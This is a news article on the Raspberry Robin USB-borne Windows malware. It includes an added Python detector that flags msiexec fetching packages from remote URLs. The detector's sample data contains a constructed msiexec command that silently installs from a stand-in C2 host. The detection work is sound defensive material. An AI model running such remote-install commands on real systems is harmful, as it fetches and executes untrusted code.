A new malware called Raspberry Robin is spreading through USB drives

Security researchers have discovered a new Windows virus that is distributed on USB drives.

The malware was named Raspberry Robin and has been spreading since September 2021. Cybersecurity experts from Red Canary have discovered this virus on the corporate networks of their clients in the technology sector.

The main distribution method for Raspberry Robin is an infected USB flash drive. When the drive is connected to a Windows computer, the virus activates a malicious file with the .LNK extension, which launches its process on the system using cmd.exe. It is noted that the virus uses the regular Microsoft Standard Installer to access the control servers; experts believe that this system is also compromised at the server level and uses Tor communication nodes.
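A defender can hunt for the step described above, where a process started through cmd.exe ends with the Microsoft Standard Installer (msiexec.exe) reaching out to a remote server. The following is an added example, not code from Red Canary or from the original article; it assumes process-creation telemetry shaped like Sysmon Event ID 1 and that the remote address appears on the msiexec command line, and every host, PID and URL in it is constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records, shaped like Sysmon Event ID 1 fields.
# Hosts, PIDs, paths and URLs are made up for illustration.
SAMPLE_EVENTS = [
    {"host": "WS-014", "pid": 4120, "ppid": 988,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c <constructed>"},
    {"host": "WS-014", "pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /q /i "http://c2.example.invalid:8080/x"'},
    {"host": "WS-022", "pid": 700, "ppid": 512,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\agent.msi /qn"},
    {"host": "WS-031", "pid": 640, "ppid": 4,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS-031", "pid": 901, "ppid": 640,
     "image": r"C:\Windows\System32\MsiExec.exe",
     "cmdline": "MsiExec.exe /I HTTPS://updates.example.invalid/tool.msi"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def find_remote_msiexec(events):
    """Flag msiexec.exe launched with a remote URL; a cmd.exe parent raises severity."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    alerts = []
    for e in events:
        # Compare case-insensitively: Windows image names are not case-sensitive.
        if basename(e["image"]).lower() != "msiexec.exe":
            continue
        match = URL_RE.search(e["cmdline"])
        if match is None:
            continue  # local package install, not a network fetch
        parent = by_pid.get((e["host"], e["ppid"]))
        parent_name = basename(parent["image"]).lower() if parent else "unknown"
        alerts.append({
            "host": e["host"], "pid": e["pid"], "url": match.group(0),
            "parent": parent_name,
            "severity": "high" if parent_name == "cmd.exe" else "medium",
        })
    return alerts

if __name__ == "__main__":
    for alert in find_remote_msiexec(SAMPLE_EVENTS):
        print(alert)
```

Legitimate software deployment can also install packages from a URL, so the medium-severity hits need review against known internal update servers before they are treated as incidents.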


Simply put, Raspberry Robin gets onto a computer via a USB drive, after which it distributes copies of itself over the network using standard Windows server services. In fact, you do not need to connect an infected flash drive to your own PC: it is enough for any user on the server network where you are located to do so, and your computer will be infected.

The most curious thing in this chain is that Raspberry Robin has not yet shown its goals. At the moment, it only spreads and settles on more and more PCs and laptops, but does nothing else. Experts don’t know what the creators of Raspberry Robin have in mind. They also still don’t know where and how the USB flash drives are infected; theoretically, any medium can be (or become) dangerous, even the one that is in your pocket.
